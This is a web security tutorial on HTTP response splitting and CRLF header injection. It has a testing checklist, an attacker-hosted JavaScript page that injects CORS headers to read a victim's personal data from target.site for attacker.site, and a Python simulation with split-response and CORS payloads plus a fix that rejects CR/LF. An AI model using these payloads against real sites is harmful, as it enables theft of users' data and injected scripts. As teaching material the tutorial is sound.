HTTP Response Splitting
HTTP/1.x uses CRLF (\r\n) to terminate each header line and an empty line (\r\n\r\n) to mark where the headers end and the body starts. If an application copies user input into a response header without removing CR and LF, an attacker can end the header line early, add headers of their own, close the header block, and append a body or even a complete second response, so that the browser (or an intermediate cache) interprets one server response as two. That is HTTP response splitting; the milder variant, where only extra headers are added to the single response, is header injection. Either way the attacker controls part of what the client treats as the server's reply.
Things to look for:
Application puts user input into a response header (redirect Location, Set-Cookie, tracking or debug headers)
Set-Cookie is a good value to test
Sites that record the referring domain to track your last visited site
There may be sanitization to bypass: check whether literal \r and \n, their encoded forms %0d and %0a, and double-encoded forms are all handled
Example from eLearn:


Once the headers are split, the browser takes the attacker-supplied second block as the response to its request and renders whatever it contains, so it can carry an XSS payload or an apparent defacement of the target site. If a proxy or browser cache stores the split response, the attacker's content can be served to other users as well.
SOP Bypass (header injection):


The attacker then hosts a page at attacker.site/evil.php whose JavaScript makes a credentialed cross-domain AJAX request to target.site. The injected CRLFs add the CORS headers the browser needs to see, so attacker.site is allowed to read the personal data in the response.
<!-- attacker.site/evil.php: served from the attacker's origin, so the request below is cross-origin -->
<div id="responseDiv"></div>
<script>
function loadXMLDoc()
{
  var xmlhttp = new XMLHttpRequest();
  // Send the victim's cookies for target.site along with the request.
  xmlhttp.withCredentials = true;
  xmlhttp.onreadystatechange = function()
  {
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
      // Only reached if the browser's CORS check on the response passes.
      document.getElementById("responseDiv").innerHTML = xmlhttp.responseText;
    }
  };
  // trackingUrl is reflected into a response header. The %0d%0a sequences inject
  // "Access-Control-Allow-Origin: http://attacker.site" and
  // "Access-Control-Allow-Credentials: true", exactly what a credentialed
  // cross-origin read requires (a wildcard origin would not be accepted).
  xmlhttp.open("GET", "http://target.site/getPersonalData.php?trackingUrl=test%0d%0aAccess-Control-Allow-Origin:%20http://attacker.site%0d%0aAccess-Control-Allow-Credentials:%20true", true);
  xmlhttp.send();
}
loadXMLDoc();
</script>
If the header injection does not work (the CR/LF is stripped, encoded, or rejected by the server), the response carries no Access-Control-Allow-Origin header and the browser blocks the cross-origin read under the same-origin policy. The request still reaches the server with the victim's cookies; only the response is withheld from the attacker's script. Note that for a request with withCredentials the injected Allow-Origin must be the exact attacker origin and Allow-Credentials must be true; a wildcard origin is not enough.
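The following is an added example, not code from the original page or from eLearn, that walks through both parts of this page in one place: the response-splitting behaviour described at the top, and the CORS header-injection bypass above. It assumes a hypothetical server endpoint that reflects the decoded trackingUrl parameter into a Set-Cookie header (the endpoint name and header layout are assumptions, and the body is constructed sample data). It then parses the resulting raw response the way a Content-Length-honouring client would, applies the browser's CORS decision to the headers it finds, and shows the server-side fix of refusing CR/LF in header values.

```python
"""Added example: response splitting, CORS header injection, and the fix.

The endpoint (build_response_*), its header layout, and BODY are all
constructed for illustration; the payloads are built from the page's
%0d%0a technique."""
from urllib.parse import unquote

CRLF = "\r\n"
BODY = '{"name":"alice","account":"****1234"}'  # constructed sample body


def _render(tracking_url: str) -> str:
    """Hypothetical getPersonalData.php: reflects the (already decoded)
    trackingUrl value into Set-Cookie with no filtering."""
    headers = [
        "HTTP/1.1 200 OK",
        "Content-Type: application/json",
        "Set-Cookie: last_page=" + tracking_url,   # user input lands here
        "Content-Length: " + str(len(BODY)),
    ]
    return CRLF.join(headers) + CRLF + CRLF + BODY


def build_response_vulnerable(query_value: str) -> str:
    return _render(unquote(query_value))


def safe_header_value(value: str) -> str:
    """Hardened form: refuse anything that could end the header line.
    Rejecting beats escaping because there is no in-band escape for
    CR/LF inside a header value."""
    if any(c in value for c in "\r\n\0"):
        raise ValueError("CR/LF not allowed in header value")
    return value


def build_response_fixed(query_value: str) -> str:
    return _render(safe_header_value(unquote(query_value)))


def fixed_rejects(query_value: str) -> bool:
    try:
        build_response_fixed(query_value)
    except ValueError:
        return True
    return False


def parse_responses(raw: str):
    """Minimal HTTP/1.1 parser that honours Content-Length, so it sees where
    one response ends and a smuggled second one begins. Returns the list of
    responses and whatever bytes were left over."""
    responses, pos = [], 0
    while raw.startswith("HTTP/", pos):
        head_end = raw.index(CRLF + CRLF, pos)
        status, *lines = raw[pos:head_end].split(CRLF)
        headers = {}
        for line in lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + len(CRLF + CRLF)
        body_len = int(headers.get("content-length", "0"))
        responses.append({"status": status, "headers": headers,
                          "body": raw[body_start:body_start + body_len]})
        pos = body_start + body_len
    return responses, raw[pos:]


def browser_allows_cross_origin_read(headers, origin, with_credentials):
    """The check a browser applies before exposing a cross-origin XHR
    response (no preflight needed for a plain GET)."""
    acao = headers.get("access-control-allow-origin")
    if acao is None:
        return False
    if with_credentials:
        # Credentialed responses need an exact origin match and ACAC: true.
        return (acao == origin and
                headers.get("access-control-allow-credentials", "").lower() == "true")
    return acao == "*" or acao == origin


# Constructed payloads. SPLIT closes the real response with an empty body and
# supplies a complete second response; CORS is the page's header-injection
# payload, with the colon that header syntax requires.
SPLIT = ("x%0d%0aContent-Length:%200%0d%0a%0d%0a"
         "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
         "Content-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E")
CORS = ("test%0d%0aAccess-Control-Allow-Origin:%20http://attacker.site"
        "%0d%0aAccess-Control-Allow-Credentials:%20true")


def demo():
    split, _ = parse_responses(build_response_vulnerable(SPLIT))
    cors, _ = parse_responses(build_response_vulnerable(CORS))
    clean, _ = parse_responses(build_response_vulnerable("test"))
    return {
        "responses_after_split": len(split),
        "second_body": split[1]["body"],
        "cors_bypass": browser_allows_cross_origin_read(
            cors[0]["headers"], "http://attacker.site", True),
        "cors_blocked_when_not_vulnerable": browser_allows_cross_origin_read(
            clean[0]["headers"], "http://attacker.site", True),
        "fixed_rejects_payload": fixed_rejects(CORS),
    }


if __name__ == "__main__":
    print(demo())
```

The leftover bytes that parse_responses returns after the split (the original Content-Length header and JSON body) are what a real client would see as trailing garbage on the connection; in practice the second response, not the leftover, is what gets rendered or cached. The fix belongs at the point where the header is built: modern frameworks already raise on CR/LF in header values, and the check here mirrors that rather than trying to escape the characters.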